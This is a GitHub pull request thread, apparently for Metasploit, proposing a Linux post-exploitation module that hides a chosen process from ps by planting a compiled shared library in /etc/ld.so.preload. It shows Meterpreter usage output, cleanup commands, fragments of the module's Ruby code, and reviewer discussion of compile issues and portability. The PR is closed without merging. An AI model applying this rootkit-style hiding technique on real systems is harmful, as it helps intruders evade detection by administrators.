### PR TITLE
Add module for linux process hide.

### PR DESCRIPTION
**Pull request by Green-m**
## Verification Steps

1. get session on target
2. `use post/linux/manage/hide_process`
3. `set cmdline <cmdline>`
4. `run`

### Tested on Kali Linux Rolling
```
msf5 post(linux/manage/hide_process) > options
Module options (post/linux/manage/hide_process):
   Name     Current Setting         Required  Description
   ----     ---------------         --------  -----------
   CMDLINE  evil.apk                yes       The cmdline to filter.
   LIBPATH  /var/tmp/.YzfidldoeyHd  yes       The shared obeject library file path
   SESSION  5                       yes       The session to run this module on.
msf5 post(linux/manage/hide_process) > sessions -i
sessions -i 1  sessions -i 5
msf5 post(linux/manage/hide_process) > sessions -i 5
[*] Starting interaction with 5...
meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter > sysinfo
Computer     : 192.168.56.103
OS           : Kali kali-rolling (Linux 4.17.0-kali1-amd64)
Architecture : x64
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux
meterpreter > bg
[*] Backgrounding session 5...
msf5 post(linux/manage/hide_process) > run
[!] SESSION may not be compatible with this module.
[*] Checking system requirement...
[+] All requirement is good.
[*] Writing c code to /tmp/TbkAYnG.c
[*] Compile c code to /var/tmp/.YzfidldoeyHd as a shared object library file
[*] Installing the process hider hook...
[+] Install the hook to hide process successful!
[+] To uninstall the hook, run command below in meterpreter.
execute -H -f sed -a "-i -e '/\/var\/tmp\/.YzfidldoeyHd/d' /etc/ld.so.preload"
rm /var/tmp/.YzfidldoeyHd
[*] Post module execution completed
```

## Before run the module
```
# root @ kali in /tmp [6:13:21] 
$ ps -ef | grep -v grep |grep evil.apk  
root      4809 10240  0 06:12 pts/2    00:00:00 vim evil.apk
```

## After 
```
# root @ kali in /tmp [6:15:30] 
$ ps -ef | grep -v grep |grep evil.apk  
```
Bingo! This process wouldn't show by `ps` command.

## Clean it
```
msf5 post(linux/manage/hide_process) > sessions -i 5
[*] Starting interaction with 5...
meterpreter > execute -H -f sed -a "-i -e '/\/var\/tmp\/.YzfidldoeyHd/d' /etc/ld.so.preload"
Process 4907 created.
meterpreter > rm /var/tmp/.YzfidldoeyHd
meterpreter >
```
Everything backs to normal!

### CODE REVIEW

File: modules/post/linux/manage/hide_process.rb [hunk 1]
```diff
@@ -0,0 +1,170 @@
...
+  def artifact
+    @artifact ||= "#{writable_dir}/#{Rex::Text.rand_text_alpha(6..12)}.c"
+  end
+
+  def lib_path
+    datastore['LIBPATH']
+  end
+
+  def preload_path
+    '/etc/ld.so.preload'
```
Comment (wvu-r7) [inline modules/post/linux/manage/hide_process.rb]: 😶

Comment (Green-m) [reply modules/post/linux/manage/hide_process.rb]: Should this be an option for the user to specify?

Comment (wvu-r7) [reply modules/post/linux/manage/hide_process.rb]: I was just musing on the fact that it applies to system-wide to dynamically linked binaries. If your C code is perfect, nothing should break!

Comment (wvu-r7) [reply modules/post/linux/manage/hide_process.rb]: I was just musing on the fact that it applies system-wide to dynamically linked binaries. If your C code is perfect, nothing should break!

**Comment by Green-m** [comment]
Thanks for your review @bcoles, giving me helpful suggestion and enlightenment every time!
I will update it soon.

File: documentation/modules/post/linux/manage/hide_process.md [hunk 2]
```diff
@@ -0,0 +1,97 @@
...
+
+## Options
+
+ **CMDLINE**
+
+ The cmdline or process name to filter.
+
+ **LIBPATH**
+
+The shared obeject library file path. Use `/var/tmp/` as default directory.
```
Comment (wvu-r7) [inline documentation/modules/post/linux/manage/hide_process.md]: Object.

File: documentation/modules/post/linux/manage/hide_process.md [hunk 3]
```diff
@@ -0,0 +1,97 @@
...
+```
+msf5 post(linux/manage/hide_process) > sessions -i 5
+[*] Starting interaction with 5...
+
+meterpreter > execute -H -f sed -a "-i -e '/\/var\/tmp\/.YzfidldoeyHd/d' /etc/ld.so.preload"
+Process 4907 created.
+meterpreter > rm /var/tmp/.YzfidldoeyHd
+meterpreter >
+```
+Everything backs to normal!
```
Comment (wvu-r7) [inline documentation/modules/post/linux/manage/hide_process.md]: Everything is back to normal.

File: documentation/modules/post/linux/manage/hide_process.md [hunk 4]
```diff
@@ -0,0 +1,97 @@
...
+### Tested on Kali Linux Rolling
+```
+msf5 post(linux/manage/hide_process) > options
+
+Module options (post/linux/manage/hide_process):
+
+   Name     Current Setting         Required  Description
+   ----     ---------------         --------  -----------
+   CMDLINE  evil.apk                yes       The cmdline to filter.
+   LIBPATH  /var/tmp/.YzfidldoeyHd  yes       The shared obeject library file path
```
Comment (wvu-r7) [inline documentation/modules/post/linux/manage/hide_process.md]: Object.

File: modules/post/linux/manage/hide_process.rb [hunk 5]
```diff
@@ -0,0 +1,170 @@
...
+    cmds  = %Q{execute -H -f sed -a "-i -e \'/#{lib_path.gsub('/', '\/')}/d\' #{preload_path}"\n}
+    cmds << "rm #{lib_path}"
+  end
+
+  #
+  # The source file.
+  #
+  def code_template
+    template = File.read(File.join(Msf::Config.data_directory, 'post', 'process_hider', 'process_hider.erb'))
+    ERB.new(template).result(binding)
```
[the remark this answers is not in the document]
Comment (Green-m) [reply modules/post/linux/manage/hide_process.rb]: Get stuck into the compile error.
```
[3] pry(#<Msf::Modules::Post__Linux__Manage__Hide_process::MetasploitModule>)> data = Metasm::ELF.compile_c(cpu, code).encode_string
Metasm::ParseError: invalid specifier list near "uintptr_t" at "</usr/include/sys/_types/_uintptr_t.h>" line 30,
	included from "\"/usr/include/i386/types.h\"" line 95,
	included from "</usr/include/machine/types.h>" line 36,
	included from "</usr/include/sys/_types/_rsize_t.h>" line 31,
	included from "</usr/include/string.h>" line 142,
	included from "\"<unk>\"" line 3
```
I know there are some variables not defined in headers, but how to find it out? 
Sorry, I am not familar with the `metasm` compiler.

[the remark this answers is not in the document]
Comment (bcoles) [reply modules/post/linux/manage/hide_process.rb]: You'll need to define the exports, as per [your advice](https://github.com/rapid7/metasploit-framework/issues/10760#issuecomment-430584256):

> This is resolved by adding some define

In hindsight, using Metasm may be a bad idea.

Unfortunately, the Metasploit host will require the appropriate libs to be installed. That's fine so long as the underlying host is Linux, but will likely be problematic on other hosts (compiling for platforms other than x86 and x86_64 may also be an issue). As awesome as Metasm is, this approach is not portable for anything but the most trivial of use cases.

Some insane individuals like to run Metasploit on Windows, spurred on by other insane individuals who decided Windows should be a supported platform for Metasploit.

An interim solution would be to attempt to compile with Metasm, then fall back to compiling on the target host. Obviously this increases the module complexity.

File: modules/post/linux/manage/hide_process.rb (hunk 1 above)
Comment (bcoles) [reply modules/post/linux/manage/hide_process.rb]: >  If your C code is perfect, nothing should break!

:shipit:

**Comment by Green-m** [comment]
I have some stuff to do, will update it when I am free.

**Comment by aringo** [comment]
Pretty neat 👍 Could this be easily updated to work with multiple CMD lines/netstat ?  If I'm installing a userland rootkit might as well go all the way :)  Wanted to bring up that this will possibly not work/ break / cause (logs/errors) on targets with SELINUX & apparmor.

**Comment by acammack-r7** [comment]
Going to `attic` for now, though this is nifty functionality that we would like to have (possibly without adding a preload for all the binaries in a system. Feel free to reopen when you have a chance to work on it again. Also, I think mettle is close to being able to implement this natively by extending https://github.com/rapid7/mettle/tree/master/libreflect to work with shared object preloads as well as executables.

**Pull request closed without merging**